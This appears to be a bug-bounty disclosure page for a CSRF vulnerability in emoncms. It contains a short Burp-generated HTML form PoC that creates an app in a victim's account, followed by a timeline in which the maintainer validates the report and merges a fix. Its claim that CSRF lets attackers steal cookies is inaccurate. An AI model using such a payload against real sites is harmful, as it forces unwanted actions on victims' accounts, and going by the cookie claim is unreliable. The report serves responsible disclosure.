Cross-Site Request Forgery (CSRF) in emoncms/emoncms


Reported on

Jul 15th 2021

✍️ Description

In CSRF attack if your users going to attacker website and click the mallicouse link then they able to steal users cookie, submit unwanted date, ....

🕵️‍♂️ Proof of Concept login in your account make a file contain the following html file. html ( as victim site) 4.client without any more interaction create unwanted App named My Energy3

// PoC.html

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="hidden" name="name" value="My&#32;Energy3" />
      <input type="hidden" name="app" value="myenergy" />
      <input type="submit" value="Submit request" />

💥 Impact

the attacker can create any App in the victim user's account.


you can set cookies on a custom header. this is a fastest way that you can protect your users

amammad modified their report
4 months ago
We have contacted a member of the emoncms team and are waiting to hear back 4 months ago
emoncms/emoncms maintainer validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
emoncms/emoncms maintainer
4 months ago


Great thanks amammad, I will take a look at this and your other similar CSRF vulnerability and get back to you shortly

emoncms/emoncms maintainer confirmed that a fix has been merged on ca1f5c 4 months ago
The fix bounty has been dropped